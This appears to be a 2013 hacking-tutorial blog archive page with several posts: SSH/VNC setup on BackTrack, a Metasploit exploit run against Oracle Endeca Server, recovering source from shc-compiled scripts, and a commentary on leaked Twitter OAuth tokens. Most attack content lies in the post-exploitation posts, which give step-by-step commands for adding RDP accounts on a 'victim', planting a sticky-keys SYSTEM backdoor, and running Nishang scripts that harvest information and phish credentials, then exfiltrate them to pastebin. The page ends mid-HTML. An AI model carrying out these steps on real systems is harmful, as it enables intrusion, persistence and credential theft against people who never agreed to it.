KNOX D3: August 2013

Access backtrack from remote computer using ssh & vnc.

<div dir="ltr" style="text-align: left;" trbidi="on">If  you want to access your local computer through remote computer ; first you need configure ssh daemon .Because nowadays people are not using telnet due to plain text protocol.<br /><br /><h4 style="text-align: left;">How to configure ssh in Backtrack 5 r3?</h4><br />(1)First we have to generate ssh key.So type following in terminal.<br /><br />ssh-keygen<br /><br />It will generate public/private rsa key pair.By default location of keys is /root/.ssh/id_rsa<br /><br />(2)Now we will move this generated keys in ssh folder.<br /><br />cd /etc/ssh<br />mkdir keys<br /><br />(3)Now copy generated keys from /root/.ssh/id_rsa & paste into keys folder which we create in second step.<br /><br />(4)Now type following command in terminal<br /> dpkg-reconfigure openssh-server<br /><br /><br />(5)Now we have to start ssh daemon ; so type following in terminal<br />service ssh start<br />  <br />(6)Now everything is setup ; you can use your ssh server via remote machine.<br />For windows you can also use putty like software.If you are on linux machine than type following command.<br />ssh -l "username" 192.168.56.1(i.p.)<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6jEn13ggmVLh9YGsR71dHv3s7_u7pRg9P7q16RGxIgPSe-2mrPDuA468oda2w0Rj4Ktm_YhVCXSz7eYza8Tkg9a3qySzYilno7-G59BCkKg2-z3z0LurFktCQL5itAbjA8HfWzuWR2UNv/s1600/Screenshot-1.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="ssh-solution-backtrack" border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6jEn13ggmVLh9YGsR71dHv3s7_u7pRg9P7q16RGxIgPSe-2mrPDuA468oda2w0Rj4Ktm_YhVCXSz7eYza8Tkg9a3qySzYilno7-G59BCkKg2-z3z0LurFktCQL5itAbjA8HfWzuWR2UNv/s320/Screenshot-1.jpeg" title="ssh-solution-backtrack" width="320" /></a></div><br /><a name='more'></a><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2KzAfhL0D7ywzFmWFb4EtjI8wfdr9mk-GICGFCyoesfJXx0NpQ2RNPbnEI5y1ForgFKYARer61vC1mZY4DbovUfBY_PkoRJnaq0lp0vJbAgdWegX-iB-sy5RKfe-V7nYNNqURpMFN4DaD/s1600/Screenshot.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="ssh-solution-backtrack" border="0" height="88" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2KzAfhL0D7ywzFmWFb4EtjI8wfdr9mk-GICGFCyoesfJXx0NpQ2RNPbnEI5y1ForgFKYARer61vC1mZY4DbovUfBY_PkoRJnaq0lp0vJbAgdWegX-iB-sy5RKfe-V7nYNNqURpMFN4DaD/s320/Screenshot.jpeg" title="ssh-solution-backtrack-1" width="320" /></a></div>If you don`t want to use ssh ; i mean you are not comfortable with command line then you can configure vnc.<br /><br /><h4 style="text-align: left;">How to setup VNC in backtrack 5 r3?</h4><br />(1)apt-get install tightvncserver<br /><i> </i><br />(2)tightvncserver<br /><br />(3)You will promoted to password .<br /><br />(4)Enter view only password<br /><br />Now for access of vnc server we have two options<br /><br />(1)If you are on linux os than use Remote Desktop Viewer<br /><br />apt-get install vinagre <br /><br />And from Edit>plugins check vnc option<br /><br />Now click on connect & enter i.p. address. <br /><br />(2)If you are on windows os than use tighvnc . Download from <a href="http://www.tightvnc.com/download.php" target="_blank">here</a><br /><br />After installing Start | All Programs | TightVNC | TightVNC Viewer<br />Add remote host address  with port number 192.168.56.1:5901. If you do not enter the port, the Windows version of TightVNC Viewer  will assume the port to be 5900 and will not be able to connect.<br /><div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRBwfzsY4KAwSKyUgMkSewDbeWrMponknKtFJ-gzkZ4GWNGXET8U8P2hXaytPDZ_9aleQ7TfN39kGtDkIubBctpZiW4yEHCm8krYCMPAYCegHfAfNNj1ihRzYh4QXcYqpL_EnViBhHa0tA/s1600/Screenshot.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="vnc-backtrack" border="0" height="233" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRBwfzsY4KAwSKyUgMkSewDbeWrMponknKtFJ-gzkZ4GWNGXET8U8P2hXaytPDZ_9aleQ7TfN39kGtDkIubBctpZiW4yEHCm8krYCMPAYCegHfAfNNj1ihRzYh4QXcYqpL_EnViBhHa0tA/s320/Screenshot.jpeg" title="vnc-backtrack" width="320" /></a></div><br />Now you can see that we can open our backtrack os using vnc from remote pc.<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifbLCObUjYoB3m_wd903MJ9wM78OT_iF2rXisRkgcpGN5xCtTfJs0jWxuB8n2BA1EuPEJR5Pn9LlzoRpD-X5flpxite1bxC16B1LUnJ4rz5lN9oCTzxAPqbzQBqjD91BwLi8B0yaFwEOU1/s1600/Screenshot-1.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="vnc-backtrack" border="0" height="210" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifbLCObUjYoB3m_wd903MJ9wM78OT_iF2rXisRkgcpGN5xCtTfJs0jWxuB8n2BA1EuPEJR5Pn9LlzoRpD-X5flpxite1bxC16B1LUnJ4rz5lN9oCTzxAPqbzQBqjD91BwLi8B0yaFwEOU1/s400/Screenshot-1.jpeg" title="vnc-backtrack" width="400" /></a></div><br /></div>

Access backtrack from remote computer using ssh & vnc.

If you want to access your local computer through remote computer ; first you need configure ssh daemon .Because nowadays people are not us...

+ Read more »

Exploit Oracle Endeca Server with metasploit.

<div dir="ltr" style="text-align: left;" trbidi="on"><br />This module exploits a command injection vulnerability on the Oracle  Endeca Server 7.4.0. The vulnerability exists on the createDataStore  method from the controlSoapBinding web service. The vulnerable method only exists on the 7.4.0 branch and isn't available on the 7.5.5.1 branch. On the other hand, the injection has been found to be Windows specific. This module has been tested successfully on Endeca Server 7.4.0.787 over Windows 2008 R2 (64 bits).<br /><br />First run ./msfupdate or git pull to update metasploit.<br /><br />Now when you open metasploit & found error like this<br />[-]     /opt/msf/modules/exploits/windows/http/oracle_endeca_exec.rb: NameError uninitialized constant Msf::Exploit::Powershell .<br /><br />Open oracle_endeca_exec.rb file in any editor.<br />Add this line require 'msf/core/exploit/powershell'  after require 'msf/core'. <br />So it look like <br />require 'msf/core' <br />require 'msf/core/exploit/powershell'<br />Save it & open metasploit again.<br /><br />Exploit target:<br /><br />   Id  Name<br />   --  ----<br />   0   Oracle Endeca Server 7.4.0 / Microsoft Windows 2008 R2 64 bits <br /><br />msf > use exploit/windows/http/oracle_endeca_exec <br />msf exploit(oracle_endeca_exec) > set rhost 192.168.56.101(victim`s i.p.)<br />rhost => 192.168.56.101<br />msf exploit(oracle_endeca_exec) > run<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqw5SW6HWuguHtZxArD4essKd7rfFXOl45yD8rx60LCvLU6EfZyRMIwPDkvMoUHUC5FEfJLnwkNsZFxMxbt9j_dICp4H0e1AK1HbDQdp0-M1hjrSh7tvED5eW4UYfmI5NwTflVUfyxdRVY/s1600/Screenshot.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Exploit-Oracle-Endeca-Server" border="0" height="177" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqw5SW6HWuguHtZxArD4essKd7rfFXOl45yD8rx60LCvLU6EfZyRMIwPDkvMoUHUC5FEfJLnwkNsZFxMxbt9j_dICp4H0e1AK1HbDQdp0-M1hjrSh7tvED5eW4UYfmI5NwTflVUfyxdRVY/s400/Screenshot.jpeg" title="Exploit-Oracle-Endeca-Server" width="400" /></a></div></div>

Exploit Oracle Endeca Server with metasploit.

This module exploits a command injection vulnerability on the Oracle Endeca Server 7.4.0. The vulnerability exists on the createDataStore ...

+ Read more »

How to get plain text source from shc compiled bash script?

<div dir="ltr" style="text-align: left;" trbidi="on"><div style="text-align: left;">Shc is used to protect your shell script from modification or inspection. If you created bash script want to distribute it , but dono`t want them to easily readble by other people , then you can use it.</div><div style="text-align: left;"><br /></div><h3 style="text-align: left;">First we see how to compiled bash script to binary?</h3><div style="text-align: left;"><br /></div><div style="text-align: left;">wget http://www.datsi.fi.upm.es/~frosal/sources/shc-3.8.7.tgz</div><div style="text-align: left;"><br /></div><div style="text-align: left;">tar -xvzf shc-3.8.7.tgz</div><div style="text-align: left;"></div><div style="text-align: left;"><br /></div><div style="text-align: left;">cd shc-3.8.7</div><div style="text-align: left;"><br /></div><div style="text-align: left;">make</div><div style="text-align: left;"><br /></div><div style="text-align: left;">./shc</div><div style="text-align: left;"><br /></div><div style="text-align: left;">You can see shc usage message.</div><div style="text-align: left;"></div><div style="text-align: left;">shc Usage: shc [-e date] [-m addr] [-i iopt] [-x cmnd] [-l lopt] [-rvDTCAh] -f script</div><div style="text-align: left;"><br /></div><div style="text-align: left;">Now we have script which we want to convert in binary.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">./shc -f /script_path</div><div style="text-align: left;"><br /></div><div style="text-align: left;">So now you can see that it will convert plain text bash source into binary which extension is  .sh.x.</div><div style="text-align: left;"><br /></div><div style="text-align: left;"><br /></div><h3 style="text-align: left;">How to retrieve plain text from binary?</h3><div style="text-align: left;"><br /></div><div style="text-align: left;">The shc compiled binary decrypts and loads the script into memory when started  right after we started the binary, just segfault it and retrieve our script from the core dump.</div><div style="text-align: left;"><br /></div><div style="text-align: left;"><br /></div><div style="text-align: left;">Core dumps are often used to  debug errors in Linux or UNIX programs. A core file is generated when an application program abnormally  terminates due to bug, operating system security protection schema, or  program simply try to write beyond the area of memory it has allocated.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">By default most of linux distributions turn off core file creation.</div><div style="text-align: left;">So we need to turn on core file creation.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">ulimit -c </div><div style="text-align: left;"><br /></div><div style="text-align: left;">If output is zero means that core file is not created.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">Now we set core file size limit to 70000 byte</div><div style="text-align: left;"><br /></div><div style="text-align: left;">ulimit -c 70000 </div><div style="text-align: left;"><br /></div><div style="text-align: left;">Now we start binary & segfault it right away.I used IP-Digger binary to get plain text from it.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">./IP-Digger4.sh.x&  ( sleep 0.02 && kill -SIGSEGV $! )</div><div style="text-align: left;"><br /></div><div style="text-align: left;"> sleep 0.02 will give the binary enough time to start up and decrypt the  original script. The variable $! contains the pid of the last background  process started, so we can easily kill it with the segmentation fault  signal SIGSEGV (same as kill -11 $!).  </div><div style="text-align: left;"><code></code></div><div style="text-align: left;">+ segmentation fault (core dumped)  ./IP-Digger4.sh.x<br /></div><div style="text-align: left;">cat core | strings >plain_text</div><div style="text-align: left;"><br /></div><div style="text-align: left;"><code></code></div><div style="text-align: left;"></div><div style="text-align: left;"></div><div style="text-align: left;"></div><div style="text-align: left;"></div><div style="text-align: left;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzmx038ey0IABTgNhcUD9UBHdTiOC0szz5wn36a1MRNtt1kOAk-dkyX5rMiFYkKqZwRcYPP0Mpzp8gkcfNeTKx9bLiH4BLkkUL-RUcvXK9dNxmWazu77tZMG8p85b4IgPzqR1vxZFXdnmS/s1600/Screenshot-1.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="shc-plain-text" border="0" height="80" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzmx038ey0IABTgNhcUD9UBHdTiOC0szz5wn36a1MRNtt1kOAk-dkyX5rMiFYkKqZwRcYPP0Mpzp8gkcfNeTKx9bLiH4BLkkUL-RUcvXK9dNxmWazu77tZMG8p85b4IgPzqR1vxZFXdnmS/s400/Screenshot-1.jpeg" title="shc-plain-text" width="400" /></a></div><div style="text-align: left;"><br />Now open plain_text file which we created & find plain text source of bash script.I upload source code of ip-digger <a href="http://pastebin.com/x5UZHeM7" target="_blank">here</a> .</div><div style="text-align: left;"><br /></div><div style="text-align: left;">But if your script is too large then adjust core file size.</div><div class="separator" style="clear: both; text-align: center;"></div><br /></div>

How to get plain text source from shc compiled bash script?

Shc is used to protect your shell script from modification or inspection. If you created bash script want to distribute it , but dono`t want...

+ Read more »

Post exploitation & swaparoo backdoor.

<div dir="ltr" style="text-align: left;" trbidi="on">Today we are going to create valid RDP user in victim pc using two method.<br /><br />(1)As usual get meterpreter session of victim using metasploit.We need system privilege So use getsystem .(getsystem will work in xp. But if victim has windows 7 than you have to use bypassuac module;it will work if victim has admin provilage.But most of time detecetd by AV. So you have to encode it. )<br /><br />Now we use meterpreter script which create RDP useraccount for logon.<br /><b>run getgui -u username -p password.</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFulPQH8sDlUivDQ6oWmlUcEHIX_ZKMcwyEu74iGMiE2TdFlbaHrDGxDjvpzijPziaE-C4KOKGCzsM1dpdjvFnmtBTpfMql918yXb_W1qJbSbdE4ReSIe3azMLcB-rD_hjZTiLNEfxklJv/s1600/Screenshot.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="msf-post-exploitation" border="0" height="221" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFulPQH8sDlUivDQ6oWmlUcEHIX_ZKMcwyEu74iGMiE2TdFlbaHrDGxDjvpzijPziaE-C4KOKGCzsM1dpdjvFnmtBTpfMql918yXb_W1qJbSbdE4ReSIe3azMLcB-rD_hjZTiLNEfxklJv/s320/Screenshot.jpeg" title="msf-post-exploitation" width="320" /></a></div><br />Now Useraccount has been created.You can use rdesktop command to connect with victim using created credentials.<br /><br /><div style="text-align: left;"><b>rdesktop victim i.p. </b></div><br /><a name='more'></a><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWEVxwZ_IyNQaHT4jwr2z2UQFRPwPeqr94pTiTwP8xUz-gTT68TtlskA2CN52EspZ6MSag-96Wrik2bfcs6uLg4-IsuqRhyphenhyphenbX-YxVq8bqCT815PzEBNztQw6lhLzETjXiYEZNVCQHsbM9y/s1600/Screenshot-1.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="msf-post-exploitation-2" border="0" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWEVxwZ_IyNQaHT4jwr2z2UQFRPwPeqr94pTiTwP8xUz-gTT68TtlskA2CN52EspZ6MSag-96Wrik2bfcs6uLg4-IsuqRhyphenhyphenbX-YxVq8bqCT815PzEBNztQw6lhLzETjXiYEZNVCQHsbM9y/s320/Screenshot-1.jpeg" title="msf-post-exploitation-2" width="320" /></a></div><br />When you complete your session type following command for cleanup process; so after you logoff created useraccount will be deleted.<br /><br /><b>run multi_console_command -rc /root/msf4/logs/scripts/getgui/clean_up_what_ever_file_name.rc</b><br /><br /><div style="text-align: left;">(2)Now we use another method; it`s backdoor.But it`s physical backdoor; so you have to present at victim pc to get access.But backdoor is created remotely.</div><div style="text-align: left;"><br />Download swaparoo script from <a href="https://github.com/Un0wnX/swaparoo/blob/master/swaparoo.rb" target="_blank">here</a> .<br /><br />Put it into the /opt/msf/scripts/meterpreter folder<br /><br />After that get meterpreter shell using any method.<br /><br />Now type <b>run swaparoo -h</b></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEO527IQVVFZGXp1JPcjL3w7KEOCAdm0DDGJ2TmguezbzyDwGLW_INaqZg-vCpFZkQwDbQIkr-jivB2aLP30pr_ih2aPBOgay2EyEc16a3lTlVkHF-tyhM5AqT45lNRkkZz4LGFww1lUpJ/s1600/reenshot.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="swaparoo-backdoor" border="0" height="128" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEO527IQVVFZGXp1JPcjL3w7KEOCAdm0DDGJ2TmguezbzyDwGLW_INaqZg-vCpFZkQwDbQIkr-jivB2aLP30pr_ih2aPBOgay2EyEc16a3lTlVkHF-tyhM5AqT45lNRkkZz4LGFww1lUpJ/s320/reenshot.jpeg" title="swaparoo-backdoor-1" width="320" /></a></div><br />Now type<b>  run swaparoo</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRgXQm25RvMwZXE_2HUEj9oaZSWlEj1QA5qf2Iwair0DNQED3gx8BaBsyAFtlXiZ3EvpxF9RJugLU-3ntkQ7lYWibfOavHs-YNDSm8PS8pOi_Rwq2fFICmuGKcPlHayeChBdpAWVZpxTrF/s1600/Sot.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="swaparoo-backdoor" border="0" height="108" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRgXQm25RvMwZXE_2HUEj9oaZSWlEj1QA5qf2Iwair0DNQED3gx8BaBsyAFtlXiZ3EvpxF9RJugLU-3ntkQ7lYWibfOavHs-YNDSm8PS8pOi_Rwq2fFICmuGKcPlHayeChBdpAWVZpxTrF/s320/Sot.jpeg" title="swaparoo-backdoor-2" width="320" /></a></div><br />As you can see in image last line is  "[+] Press Shift key 5 times at Login Screen and you should be greeted by a shell!"<br /><br />So when you restart victim pc & login screen appear ; just press shift key 5 times (From victim `s keyboard)you get cmd with system privilege.Now from cmd you can do anything like remove user,add user, change password.<br /><br />If you want to remove this backdoor then type following command<br /><br /><b>run swaparoo -r </b><br /><br /><b>What`s limitation?</b><br /><br />Anyone who is physically  present at terminal can get system cmd just by pressing keys.Because it does not ask for credentials.</div>

Post exploitation & swaparoo backdoor.

Today we are going to create valid RDP user in victim pc using two method. (1)As usual get meterpreter session of victim using metasploit.We...

+ Read more »

15k Twitter Account Hacked, A True Story?

<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhn7WNUlBLsJ8eGf4PyDsPPn9Gp67IVQkmXdaZpw8QmprIAL_NuOkSAO0ibu9WynO9sczgymwlXiaj4LfZ3uRnvO765lXiC01j4EGfThJI0MjOAkGeGx1KqQjtSE-TKrnw-N-vexOSoa1Y/s1600/ailbje.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="319" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhn7WNUlBLsJ8eGf4PyDsPPn9Gp67IVQkmXdaZpw8QmprIAL_NuOkSAO0ibu9WynO9sczgymwlXiaj4LfZ3uRnvO765lXiC01j4EGfThJI0MjOAkGeGx1KqQjtSE-TKrnw-N-vexOSoa1Y/s320/ailbje.png" width="320" /></a></div><br />Few days back an article was published on techworm.in, where a hacker named "Mauritania Attacker" leaked claimed to leak thousands of twitter accounts, the data was made available for public to use and was uploaded on zippyshare.com. The data contained the twitterid, twitternick, oauthtoken nand oauth_token_secret.<br /><br /><a name='more'></a><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAh37YtjiD0SyEXApdxUpVrQxg1eqwmsdfDm2ibPYnDh42lkpSz1CxrhzhSv6p1U84L9XAKd7N6Nid4ji5C1ze5AUx2FmpnGV9crgGncJRTOsGS-_YWFtHs4LdRzQqsHPuuIupnwdbf6s/s1600/21418_156851031180990_415079354_n.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="267" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAh37YtjiD0SyEXApdxUpVrQxg1eqwmsdfDm2ibPYnDh42lkpSz1CxrhzhSv6p1U84L9XAKd7N6Nid4ji5C1ze5AUx2FmpnGV9crgGncJRTOsGS-_YWFtHs4LdRzQqsHPuuIupnwdbf6s/s640/21418_156851031180990_415079354_n.jpg" width="640" /></a></div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;"><b>How Was the data breached?</b></div><div class="separator" style="clear: both; text-align: left;"><b><br /></b></div><div class="separator" style="clear: both; text-align: left;">Well, it seems to me that the database of a third party app was breached which contained the list of Oauth tokens. In laymen terms oauth is used for <u>authorizing the third party applications without the need of giving them the password</u>. </div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;">The application is granted an access token which it uses to authorize it selves, which means that an attacker <u>having hold of the access token would be able to access the twitter accounts without the need of a password</u>. The Oauth tokens can be easily be by tampering the request with a webapplication proxy such as Tamper Data, Burp suite etc. Twitter has recently introduced Two step authentication, however it isn't much handy in this case.</div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;"><b>How Twitter Users Can Protect Themselves?  </b></div><br />Well, if the attacker keeps compromising database of the third party applications and getting the hold of the oauth tokens, then their is not much that twitter can do, Since they can protect their database from being breached, however they certainly have no hold of the third party application database.<br /><br /><b><u>Twitter users are advised to revoke access to all the third party application and reauthorize them</u></b>, therefore the access tokens would be expired and the attacker would not be able to use them. Twitter users should only use trusted third party applications and when they are not using any of them, they should revoke the access so that the access token would be expired.<br /><br />Facebook, has also known issues with their oauth in past, Security reseachers have pointed multiple flaws and all of them relied upon stealing of the oauth tokens, The issue with twitter in this case is a bit different, the access tokens were compromised due to a third party app, whereas in facebook oauth tokens could have been compromised due to a flaw inside it's design.<br /><br />Twitter has denied the claims made by an attacker that any part of the twitter's database was compromised, which seems true to me. The Mauritania Attacker has posted a status on his facebook that he will reveal exactly how the access tokens were compromised today to techworm.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl1xta-Nbd8BpDRuCkrnJRnnLhzwB5eBF-P96Qs3em3q87HEBi2Y_W-MIURLNe8tTOBxYF2mCe_ZZBlSCt7mtglpkgh4trZe56cbfCNFFDMe3u3Oij5Y07d3_EKKSNNn2RbS4yTgLxG1w/s1600/Untitled.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl1xta-Nbd8BpDRuCkrnJRnnLhzwB5eBF-P96Qs3em3q87HEBi2Y_W-MIURLNe8tTOBxYF2mCe_ZZBlSCt7mtglpkgh4trZe56cbfCNFFDMe3u3Oij5Y07d3_EKKSNNn2RbS4yTgLxG1w/s1600/Untitled.png" /></a></div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;">Stay subscribed to RHA for more of the security insights. </div><br /></div>

15k Twitter Account Hacked, A True Story?

Few days back an article was published on techworm.in, where a hacker named "Mauritania Attacker" leaked claimed to leak thousands...

+ Read more »

Post exploitation using Nishang.

<div dir="ltr" style="text-align: left;" trbidi="on">Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and post exploitation during Penetraion Tests. The scripts are written on the basis of requirement by the author during real Penetration Tests. <br /><br />This framework is written by Nikhil Mittal who is also author of Kautilya framework.For more information you can visit his <a href="http://labofapenetrationtester.blogspot.com/" target="_blank">blog</a>. <br /><br />Today we will see some basic module from nishang framework for post exploitation.<br /><br />This tutorial is about post exploitation so first get meterpreter shell using any metasploit method. If you are new than visit <a href="http://tipstrickshack.blogspot.com/search/label/metasploit/" target="_blank">metasploit</a> section of blog.<br /><br />(1)Download nishang from <a href="https://code.google.com/p/nishang/downloads/detail?name=nishang_0.3.0.zip&can=2&q=" target="_blank">here .</a><br /><div class="separator" style="clear: both; text-align: center;"></div>(2)Unzip it & put it in root directory.<br /><br />meterpreter>shell<br />cd C:\\Users/victim<br />mkdir 123<br />exit<br /><br />meterpreter>upload /root/nishang/ C:\\Users/victim/123<br /><br />We upload all powershell script from our nishang folder to victim pc `s folder.<br /><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgl_QvaygehbmsPygHTJZcp-zPI_eukCewbirMPEtVaHDKx1TppVpn-7E5jFmMWuZqJS3LuLGYemQ1YNmPhRdKDr-DEung77X6NJq4E9xGduWyZ79DzFppskmrqNYFHZnqZ9rtAMUizM8y4/s1600/Screenshot-1.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="nishang-1" border="0" height="128" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgl_QvaygehbmsPygHTJZcp-zPI_eukCewbirMPEtVaHDKx1TppVpn-7E5jFmMWuZqJS3LuLGYemQ1YNmPhRdKDr-DEung77X6NJq4E9xGduWyZ79DzFppskmrqNYFHZnqZ9rtAMUizM8y4/s640/Screenshot-1.jpeg" title="nishang-1" width="640" /></a></div><br />After upload we have to get shell.<br /><br />meterpreter>shell<br />cd c://Windows\System32\WindowsPowerShell\v1.0<br /><br /><br />So now everything is set ; we execute our powershell script from our shell.<br /><br />(1)First we use Information Gather module. It gather all informataion from victim pc & it has exifil option so gatherd information is directly uploaded to the pastebin;gmail.<br /><br />So type following in our shell<br /><br />powershell.exe -ExecutionPolicy Bypass -command C:\\Users/victim/123/Information_Gather.ps1 -exfil AIP_Of_Pastebin username password 1<br /><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizY4JxFjTwBqqveQZYJSeW36Fcl0clzRTCLYKgQeFQxsVUAlFXnDq9kBFNSQ6ulQ8kojG9E5Yiyb5p8wCSezCWN7bt4xbFX5JB8iMgWvOAXPb7joiGyZhX65wiT-hEOxmY0o6Cj8MGe67C/s1600/Screenshot-2.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="nishang-1" border="0" height="78" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizY4JxFjTwBqqveQZYJSeW36Fcl0clzRTCLYKgQeFQxsVUAlFXnDq9kBFNSQ6ulQ8kojG9E5Yiyb5p8wCSezCWN7bt4xbFX5JB8iMgWvOAXPb7joiGyZhX65wiT-hEOxmY0o6Cj8MGe67C/s640/Screenshot-2.jpeg" title="nishang-2" width="640" /></a></div><a name='more'></a><br />After execution complete information is uploaded to the your pastebin account.<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhj37jnpBcy8kpvOfGps3tcPZnHh8bsDv1QgWjQaI8BYJSn2mrey6BNIgw0p71kOXPsMU7p5pzAZ9BEIgQa1X2e0M4wRl_N553TVZ6IW_RjAEE1qceFSvamEKF6iEz8WvkxpV3TX7UMJQN5/s1600/nishang.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="nishang-3" border="0" height="136" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhj37jnpBcy8kpvOfGps3tcPZnHh8bsDv1QgWjQaI8BYJSn2mrey6BNIgw0p71kOXPsMU7p5pzAZ9BEIgQa1X2e0M4wRl_N553TVZ6IW_RjAEE1qceFSvamEKF6iEz8WvkxpV3TX7UMJQN5/s320/nishang.jpeg" title="nishang-3" width="320" /></a></div><br /><br />This information is encoded in base64; so to get plain text decode it using base64 decoder.<br /><br />(2)Another module is credential pop up. So it pop up credential menu in victim screen ; if victim enter right password then it will stop ;otherwise it will pop up again.<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjc9t53UPD3hcmA8Q_e6mSAvOYgql4vNCYWqy3lGXKHebGhLb78fwRwJ4D7YEJwm3duIxPpDETFcb1c52ojzn9TYCbRlvhsdZmSCT0hI1z2nkYbjoCFyqY5tkhBGUi-FQatxCg7xP-oLGMf/s1600/Screenshot-4.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="nishang-4" border="0" height="66" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjc9t53UPD3hcmA8Q_e6mSAvOYgql4vNCYWqy3lGXKHebGhLb78fwRwJ4D7YEJwm3duIxPpDETFcb1c52ojzn9TYCbRlvhsdZmSCT0hI1z2nkYbjoCFyqY5tkhBGUi-FQatxCg7xP-oLGMf/s640/Screenshot-4.jpeg" title="nishang-4" width="640" /></a></div><br />powershell.exe -ExecutionPolicy Bypass -command C:\\Users/victim/123/Credentials.ps1 -exfil AIP_Of_Pastebin username password 1<br /><br /><div class="separator" style="clear: both; text-align: center;"></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3I4VLnPnxyhrazg71PKHGbxN4fyRkbzPPW3XcQx0u1FISw0eJFtV2pgeGk7Xrhw1ZqHbi7lOT1TUgZtQwiJ7unTaef4Yya83hyphenhyphenVVLrIp73sWhVlnuj2LVXGwRiztKIq8_m4FEg2voRXtp/s1600/nishang2.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="nishang-5" border="0" height="171" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3I4VLnPnxyhrazg71PKHGbxN4fyRkbzPPW3XcQx0u1FISw0eJFtV2pgeGk7Xrhw1ZqHbi7lOT1TUgZtQwiJ7unTaef4Yya83hyphenhyphenVVLrIp73sWhVlnuj2LVXGwRiztKIq8_m4FEg2voRXtp/s320/nishang2.jpeg" 